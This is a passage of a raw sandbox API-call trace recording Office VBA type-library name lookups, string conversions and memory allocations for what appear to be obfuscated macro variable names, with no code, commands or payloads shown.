| out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.864] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.864] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a612c2 | out: _Dst=0x67c2d40) returned 0x0 [0068.864] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qccDwDAA") returned 0x10f1ca [0068.864] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qccDwDAA" | out: _Dst="_B_var_qccDwDAA") returned 0x0 [0068.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qccDwDAA") returned 16 [0068.864] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.864] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qccDwDAA", lHashVal=0x10f1ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.864] IUnknown:Release (This=0x665ba50) returned 0xd [0068.864] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.864] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qccDwDAA", lHashVal=0x10f1ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.864] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.864] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.864] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qccDwDAA", lHashVal=0x10f1ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.864] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.864] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.864] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qccDwDAA", lHashVal=0x10f1ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.864] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.864] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.864] IUnknown:Release (This=0x665ba50) returned 0xd [0068.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2cba, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_qccDwDAA") returned 16 [0068.865] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qccDwDAA", lHashVal=0x10f1ca, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0) returned 0x0 [0068.865] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a612c2 | out: _Dst=0x144ec0) returned 0x0 [0068.865] IMalloc:Realloc (This=0x7fefec05380, pv=0x69503b0, cb=0xc0) returned 0x397070 [0068.865] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4af0000 [0068.865] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NBxQxZAA") returned 9 [0068.866] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NBxQxZAA", lHashVal=0x10263c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NBxQxZAA") returned 9 [0068.866] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NBxQxZAA", lHashVal=0x10263c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NBxQxZAA") returned 9 [0068.866] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NBxQxZAA", lHashVal=0x10263c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.866] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NBxQxZAA") returned 0x10263c [0068.866] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="NBxQxZAA" | out: _Dst="NBxQxZAA") returned 0x0 [0068.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="NBxQxZAA") returned 9 [0068.866] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.866] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NBxQxZAA", lHashVal=0x10263c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.866] IUnknown:Release (This=0x665ba50) returned 0xd [0068.866] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.866] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NBxQxZAA", lHashVal=0x10263c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.866] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.866] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.866] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NBxQxZAA", lHashVal=0x10263c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.866] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.866] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.866] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NBxQxZAA", lHashVal=0x10263c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.866] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NBxQxZAA") returned 9 [0068.867] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NBxQxZAA", lHashVal=0x10263c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.867] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.867] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a612ee | out: _Dst=0x67c2d40) returned 0x0 [0068.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NBxQxZAA") returned 0x10fe04 [0068.867] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_NBxQxZAA" | out: _Dst="_B_var_NBxQxZAA") returned 0x0 [0068.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_NBxQxZAA") returned 16 [0068.867] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.867] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NBxQxZAA", lHashVal=0x10fe04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.867] IUnknown:Release (This=0x665ba50) returned 0xd [0068.867] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.867] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NBxQxZAA", lHashVal=0x10fe04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.867] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.867] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.867] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NBxQxZAA", lHashVal=0x10fe04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.867] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.867] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.867] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NBxQxZAA", lHashVal=0x10fe04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.867] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.867] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.867] IUnknown:Release (This=0x665ba50) returned 0xd [0068.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2cea, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_NBxQxZAA") returned 16 [0068.867] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NBxQxZAA", lHashVal=0x10fe04, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0) returned 0x0 [0068.867] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a612ee | out: _Dst=0x144ec0) returned 0x0 [0068.868] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mAZQCA_X", lHashVal=0x105339, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6131a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mAZQCA_X") returned 9 [0068.868] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mAZQCA_X", lHashVal=0x105339, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6131a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mAZQCA_X") returned 9 [0068.868] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mAZQCA_X", lHashVal=0x105339, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.868] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAZQCA_X") returned 0x105339 [0068.868] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="mAZQCA_X" | out: _Dst="mAZQCA_X") returned 0x0 [0068.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="mAZQCA_X") returned 9 [0068.868] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.868] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mAZQCA_X", lHashVal=0x105339, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.868] IUnknown:Release (This=0x665ba50) returned 0xd [0068.868] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.868] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mAZQCA_X", lHashVal=0x105339, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.868] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.868] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.868] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mAZQCA_X", lHashVal=0x105339, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.868] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.868] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.868] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mAZQCA_X", lHashVal=0x105339, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.868] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6131a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mAZQCA_X") returned 9 [0068.868] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mAZQCA_X", lHashVal=0x105339, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.869] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.869] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6131a | out: _Dst=0x67c2d40) returned 0x0 [0068.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mAZQCA_X") returned 0x102ac2 [0068.869] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_mAZQCA_X" | out: _Dst="_B_var_mAZQCA_X") returned 0x0 [0068.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_mAZQCA_X") returned 16 [0068.869] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.869] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mAZQCA_X", lHashVal=0x102ac2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.869] IUnknown:Release (This=0x665ba50) returned 0xd [0068.869] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.869] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mAZQCA_X", lHashVal=0x102ac2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.869] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.869] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.869] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mAZQCA_X", lHashVal=0x102ac2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.869] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.869] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.869] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mAZQCA_X", lHashVal=0x102ac2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.869] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.869] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.869] IUnknown:Release (This=0x665ba50) returned 0xd [0068.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2d1a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_mAZQCA_X") returned 16 [0068.869] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mAZQCA_X", lHashVal=0x102ac2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0068.869] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6131a | out: _Dst=0x144ec0) returned 0x0 [0068.869] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.869] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.869] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.869] IUnknown:Release (This=0x665ba50) returned 0xd [0068.869] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.870] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.870] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.870] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.870] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.870] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.870] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.870] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.870] IUnknown:Release (This=0x665ba50) returned 0xd [0068.870] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.870] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.870] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.870] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.870] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.870] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.870] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.870] IUnknown:Release (This=0x665ba50) returned 0xd [0068.870] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.870] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.870] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.870] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.870] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.870] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.870] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.870] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.870] IUnknown:Release (This=0x665ba50) returned 0xd [0068.870] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.871] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.871] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.871] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.871] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.871] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.871] IUnknown:Release (This=0x665ba50) returned 0xd [0068.871] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.871] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.871] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.871] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.871] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.871] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.871] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.871] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.871] IUnknown:Release (This=0x665ba50) returned 0xd [0068.871] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.871] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.871] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.871] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.871] IUnknown:Release (This=0xaf0b6e0) 